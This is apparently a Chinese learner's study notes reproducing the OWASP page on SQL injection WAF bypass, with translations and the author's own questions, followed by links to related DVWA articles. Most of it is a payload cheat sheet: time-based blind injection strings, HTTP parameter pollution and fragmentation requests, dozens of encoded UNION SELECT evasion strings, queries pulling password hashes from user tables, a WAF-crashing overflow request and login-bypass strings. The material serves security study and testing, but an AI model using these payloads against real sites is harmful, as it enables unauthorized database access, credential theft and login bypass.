本文目录

SQLI
SQL injection--Basic Concepts
Bypass with Comments
Case Changing
Replaced Keywords
Advanced Methods
Auth Bypass
Benchmark

SQLI

A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.
SQL 注入攻击包括通过从客户端到应用程序的输入数据插入或“注入”SQL 查询。成功的 SQL 注入漏洞可以从数据库中读取敏感数据、修改数据库数据（插入/更新/删除）、对数据库执行管理操作（例如关闭 DBMS）、恢复 DBMS 文件中存在的给定文件的内容系统并在某些情况下向操作系统发出命令。 SQL 注入攻击是一种注入攻击，其中 SQL 命令被注入到数据平面输入中，以影响预定义 SQL 命令的执行。

SQL injection–Basic Concepts

There are two types of SQL injection:

SQL injection into a String/Char parameter
Example: SELECT * from table where example = 'Example'
SQL Injection into a Numeric parameter
Example: SELECT * from table where id = 123

A vulnerable request can get into Insert, Update, Delete, etc.
Example: UPDATE users SET pass = '1' where user = 't1' OR 1=1--'

Blind SQL Injection
Example: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(200000,md5(now())))

SLEEP(5)--
SELECT BENCHMARK(1000000,MD5('A'));
id=1 OR SLEEP(25)=0 LIMIT 1--
id=1) OR SLEEP(25)=0 LIMIT 1--
id=1' OR SLEEP(25)=0 LIMIT 1--
id=1') OR SLEEP(25)=0 LIMIT 1--
id=1)) OR SLEEP(25)=0 LIMIT 1--
id=SELECT SLEEP(25)--`

Bypassing WAF: SQL Injection - Normalization Method Example Number (1) of a vulnerability in the function of request Normalization. • The following request doesn’t allow anyone to conduct an attack
绕过WAF：SQL注入-规范化方法示例请求规范化功能中的漏洞编号（1）。 • 以下请求不允许任何人进行攻击

/?id=1+union+select+1,2,3/*

• If there is a corresponding vulnerability in the WAF, this request

will be successfully performed /?id=1/*union*/union/*select*/select+1,2,3/*

• After being processed by WAF, the request will become

index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*

The given example works in case of cleaning of dangerous traffic, not in case of blocking the entire request or the attack source. Example Number (2) of a vulnerability in the function of request Normalization. • Similarly, the following request doesn’t allow anyone to conduct an attack
给定的示例适用于清除危险流量的情况，而不适用于阻止整个请求或攻击源的情况。示例请求规范化功能中的漏洞编号 (2)。 • 同样，以下请求不允许任何人进行攻击

/?id=1+union+select+1,2,3/*

• If there is a corresponding vulnerability in the WAF, this request will be successfully performed

/?id=1+un/**/ion+sel/**/ect+1,2,3--

• The SQL request will become

SELECT * from table where id =1 union select 1,2,3--

Instead of construction /**/, any symbol sequence that WAF cuts off can be used (e.g., #####, %00).

可以使用 WAF 切断的任何符号序列来代替构造 /**/（例如，#####、%00）。

The given example works in case of excessive cleaning of incoming data (replacement of a regular expression with the empty string).

Using HTTP Parameter Pollution (HPP)
• The following request doesn’t allow anyone to conduct an attack

/?id=1;select+1,2,3+from+users+where+id=1--

• This request will be successfully performed using HPP

/?id=1;select+1&id=2,3+from+users+where+id=1--
这里什么情况不理解啊
Successful conduction of an HPP attack bypassing WAF depends on the environment of the application being attacked

Using HTTP Parameter Pollution (HPP) • Vulnerable code

SQL=" select key from table where id= "+Request.QueryString("id")

• This request is successfully performed using the HPP technique

/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

• The SQL request becomes select key from table where

id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users

ByPassing WAF: SQL Injection – HPF Using HTTP Parameter Fragmentation (HPF)
绕过 WAF：SQL 注入 – HPF 使用 HTTP 参数分段 (HPF)
• Vulnerable code example

 Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);  Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']);

• The following request doesn’t allow anyone to conduct an attack

/?a=1+union+select+1,2/*

• These requests may be successfully performed using HPF

/?a=1+union/&b=/select+1,2 /?a=1+union/&b=/select+1,pass/&c=/from+users–

• The SQL requests become

select * from table where a=1 union/* and b=/select 1,2 select * from table where a=1 union/ and b=/select 1,pass/ limit */from users–
也不理解，HPF， WAF的本质是什么？不清楚

Bypassing WAF: Blind SQL Injection Using logical requests AND/OR • The following requests allow one to conduct a successful attack for many WAFs
/?id=1+OR+0x50=0x50
/?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Negation and inequality signs (!=, <>, <, >) can be used instead of the equality one – It is amazing, but many WAFs miss it!
可以使用否定和不等号 (!=, <>, <, >) 来代替等号——这很神奇，但许多 WAF 都错过了！
It becomes possible to exploit the vulnerability with the method of blind-SQL Injection by replacing SQL functions that get to WAF signatures with their synonyms.substring() -> mid(), substr() ascii() -> hex(), bin() benchmark() -> sleep()
通过将获取 WAF 签名的 SQL 函数替换为其同义词，可以使用盲 SQL 注入方法来利用该漏洞。
Wide variety of logical requests.

 and 1or 1and 1=1 and 2<3 and ‘a’=’a’ and ‘a’<>‘b’ and char(32)=’ ‘ and 3<=2 and 5<=>4 and 5<=>5 and 5 is null or 5 is not null ….

An example of various request notations with the same meaning.
具有相同含义的各种请求符号的示例。

select user from mysql.user where user = ‘user’ OR mid(password,1,1)=’*’
select user from mysql.user where user = ‘user’ OR mid(password,1,1)=0x2a
select user from mysql.user where user = ‘user’ OR mid(password,1,1)=unhex(‘2a’)
select user from mysql.user where user = ‘user’ OR mid(password,1,1) regexp ‘[*]’
select user from mysql.user where user = ‘user’ OR mid(password,1,1) like ‘*’
select user from mysql.user where user = ‘user’ OR mid(password,1,1) rlike ‘[*]’
select user from mysql.user where user = ‘user’ OR ord(mid(password,1,1))=42
select user from mysql.user where user = ‘user’ OR ascii(mid(password,1,1))=42
select user from mysql.user where user = ‘user’ OR find_in_set(‘2a’,hex(mid(password,1,1)))=1
select user from mysql.user where user = ‘user’ OR position(0x2a in password)=1
select user from mysql.user where user = ‘user’ OR locate(0x2a,password)=1

Known:

substring((select ‘password’),1,1) = 0x70
substr((select ‘password’),1,1) = 0x70
mid((select ‘password’),1,1) = 0x70

New:

strcmp(left(‘password’,1), 0x69) = 1
strcmp(left(‘password’,1), 0x70) = 0
strcmp(left(‘password’,1), 0x71) = -1

STRCMP(expr1,expr2) returns 0 if the strings are the same, -1 if the first , argument is smaller than the second one, and 1 otherwise.

An example of signature bypass. The following request gets to WAF signature /?id=1+union+(select+1,2+from+users) But sometimes, the signatures used can be bypassed /?id=1+union+(select+’xz’from+xxx)

/?id=(1)union(select(1),mid(hash,1,32)from(users))
/?id=1+union+(select'1',concat(login,hash)from+users)
/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
/?id=(1)or(0x50=0x50)

An SQL Injection attack can successfully bypass the WAF , and be conducted in all following cases:; • Vulnerabilities in the functions of WAF request normalization.
• Application of HPP and HPF techniques.
• Bypassing filter rules (signatures).
• Vulnerability exploitation by the method of blind SQL Injection.
• Attacking the application operating logics (and/or)
SQL注入攻击可以成功绕过WAF，并且可以在以下所有情况下进行：: • WAF请求规范化功能中的漏洞。
• HPP 和HPF 技术的应用。
• 绕过过滤规则（签名）。
• 通过SQL 盲注方法进行漏洞利用。
• 攻击应用程序操作逻辑（和/或）

WAF Bypassing Strings.

 /*!%55NiOn*/ /*!%53eLEct*/   %55nion(%53elect 1,2,3)-- -   +union+distinct+select+   +union+distinctROW+select+   /**//*!12345UNION SELECT*//**/   concat(0x223e,@@version)   concat(0x273e27,version(),0x3c212d2d) concat(0x223e3c62723e,version(),0x3c696d67207372633d22)   concat(0x223e,@@version,0x3c696d67207372633d22)
concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)
concat(0x223e3c62723e,@@version,0x3a,BlackRose”,0x3c696d67207372633d22)   concat(‘’,@@version,’’)   /**//*!50000UNION SELECT*//**/   /**/UNION/**//*!50000SELECT*//**/   /*!50000UniON SeLeCt*/   union /*!50000%53elect*/   +#uNiOn+#sEleCt   +#1q%0AuNiOn all#qa%0A#%0AsEleCt   /*!%55NiOn*/ /*!%53eLEct*/   /*!u%6eion*/ /*!se%6cect*/   +un/**/ion+se/**/lect   uni%0bon+se%0blect   %2f**%2funion%2f**%2fselect   union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A   REVERSE(noinu)+REVERSE(tceles)   /*--*/union/*--*/select/*--*/   union (/*!/**/ SeleCT */ 1,2,3)   /*!union*/+/*!select*/   union+/*!select*/   /**/union/**/select/**/   /**/uNIon/**/sEleCt/**/   /**//*!union*//**//*!select*//**/   /*!uNIOn*/ /*!SelECt*/   +union+distinct+select+   +union+distinctROW+select+   +UnIOn%0d%0aSeleCt%0d%0a   UNION/*&test=1*/SELECT/*&pwn=2*/   un?+un/**/ion+se/**/lect+   +UNunionION+SEselectLECT+   +uni%0bon+se%0blect+   %252f%252a*/union%252f%252a /select%252f%252a*/   /%2A%2A/union/%2A%2A/select/%2A%2A/   %2f**%2funion%2f**%2fselect%2f**%2f   union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A   /*!UnIoN*/SeLecT+

Union Select by PASS with Url Encoded Method:

%55nion(%53elect)
union%20distinct%20select
union%20%64istinctRO%57%20select
union%2053elect
%23?%0auion%20?%23?%0aselect
%23?zen?%0Aunion
all%23zen%0A%23Zen%0Aselect
%55nion %53eLEct
u%6eion se%6cect
unio%6e %73elect
unio%6e%20%64istinc%74%20%73elect
uni%6fn distinct%52OW s%65lect
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7

Illegal mix of Collations ByPass Method :

unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?

Bypass with Comments

SQL comments allow us to bypass a lot of filtering and WAFs.

Code :http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--

Case Changing

Some WAFs filter only lowercase SQL keyword.

Regex Filter: /union\sselect/g

http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--

Replaced Keywords

Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass easily.

http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--

Some case SQL keyword was filtered out and replaced with whitespace. So we can use “%0b” to bypass.

http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--

For Mod_rewrite, Comments “//” cannot bypassed. So we use “%0b” replace “//”.

Forbidden: http://victim.com/main/news/id/1/**/
|
|/**/lpad(first_name,7,1).html
Bypassed : http://victim.com/main/news/id/1%0b
|
|%0blpad(first_name,7,1).html

这里不理解，可能不熟悉PHP语言吧

Advanced Methods

Crash Firewall via doing Buffer Over Flow.
通过执行缓冲区溢出使防火墙崩溃。

Buffer Overflow / Firewall Crash: Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow.

http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 “A”)..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….
You can test if the WAF can be crashed by typing:
page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….
If you get a 500, you can exploit it using the Buffer Overflow Method.

Replace Characters with their HEX Values: We can replace some characters with their HEX (URL-Encoded) Values.

Example:http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….(which means “union select”)

Misc Exploitable Functions: Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):

Example:This firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4…(If the Firewall removes the “*”, the result will be: 15+union+select….)So, if you find such a silly function, you can exploit it, in this way.

Auth Bypass

If we need to bypass some admin panels, and we do that using or 1=1.

Code:
or 1-- -'
or 1 or '1"or 1 or"

SELECT * FROM login WHERE id=1 or 1– -‘ or 1 or ‘1”or 1 or” AND username=’’ AND password=’’

这个句子啥意思，几个SQL语句揉在一起写，不清晰。
the “or 1– -“ gets active, make the condition true and ignores the rest of the query. now lets check regular string-

SELECT * FROM login WHERE username=’ or 1– -‘ or 1 or ‘1”or 1 or” ‘ …..

the “or 1” part make the query true, and the other parts are considered as the comparison strings. same with the double quotes.

 SELECT * FROM login WHERE username=” or 1– -‘ or 1 or ‘1”or 1 or” “

Benchmark

Please use ’ Benchmark’ and make you own SQLi Strings and test your different test cases on Benchmark
OWASP Benchmark Project

The OWASP Benchmark Project is a Java test suite designed to evaluate the accuracy, coverage, and speed of automated software vulnerability detection tools. Without the ability to measure these tools, it is difficult to understand their strengths and weaknesses, and compare them to each other.
OWASP 基准项目是一个 Java 测试套件，旨在评估自动化软件漏洞检测工具的准确性、覆盖率和速度。如果没有衡量这些工具的能力，就很难了解它们的优势和劣势，并将它们相互比较。

OWASP Benchmark is a fully runnable open source web application that contains thousands of exploitable test cases, each mapped to specific CWEs, which can be analyzed by any type of Application Security Testing (AST) tool, including SAST, DAST (like OWASP ZAP), and IAST tools. The intent is that all the vulnerabilities deliberately included in and scored by the Benchmark are actually exploitable so its a fair test for any kind of application vulnerability detection tool. The Benchmark also includes dozens of scorecard generators for numerous open source and commercial AST tools, and the set of supported tools is growing all the time.
OWASP Benchmark 是一个完全可运行的开源 Web 应用程序，其中包含数千个可利用的测试用例，每个都映射到特定的 CWE，可以通过任何类型的应用程序安全测试 (AST) 工具进行分析，包括 SAST、DAST（如 OWASP ZAP）、和 IAST 工具。其目的是有意包含在基准中并由基准评分的所有漏洞实际上都是可利用的，因此它对任何类型的应用程序漏洞检测工具都是一个公平的测试。基准测试还包括用于众多开源和商业 AST 工具的数十种记分卡生成器，并且支持的工具集一直在增长。

参考链接：
https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF

SQL Injection Bypassing WAF ——from DVWA ——2012-12-8相关推荐

DVWA学习（二）SQL Injection(Blind)
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是 ...
DVWA学习（一）SQL Injection
本文参考自https://www.jianshu.com/u/9dac23b54fba,根据自己的学习进度可能会有不同的地方,详细可以查看原文链接. SQL Injection,即SQL注入,是指攻击 ...
DVWA通关--SQL注入(SQL Injection)
目录 LOW 通关步骤一.手工注入二.sqlmap注入代码分析 MEDIUM 通关步骤方法一.手工注入方法二.sqlmap注入代码分析 HIGH 通关步骤方法一.手工注入方法二.sql ...
DVWA之SQL Injection (Blind)
DVWA之SQL Injection (Blind) low 查看源代码可知,对输入字符串没有进行任何过滤 <?phpif( isset( $_GET[ 'Submit' ] ) ) {// G ...
DVWA—sql注入（ SQL Injection）
DVWA-sql注入( SQL Injection) 原理将恶意的sql语句拼接到合法的语句中,从而达到执行sql语句的目的. 类型数字字符搜索过程 1.判断是否存在注入,注入时字符型还是数 ...
【Web安全】关于SQL Injection和盲注的探索（DVWA）
文章目录 1 SQL Injection 1.1 解释 1.2 手工注入思路 1.3 low 2 SQL Injection (Blind) 2.1 SQL盲注与普通的SQL注入区别 2.2 low ...
深入理解SQL注入绕过WAF和过滤机制
知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...
深入理解SQL注入绕过WAF与过滤机制
知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...
网络***技术开篇——SQL Injection
http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要日前,国内最大的程序员社区CSDN网站的用户数据库被***公开 ...
Oracle Caused by: java.sql.SQLException: sql injection violation, syntax error: syntax error, expect
参考:https://blog.csdn.net/qq_36326332/article/details/102938147 https://blog.csdn.net/fly_captain/art ...

SQL Injection Bypassing WAF ——from DVWA ——2012-12-8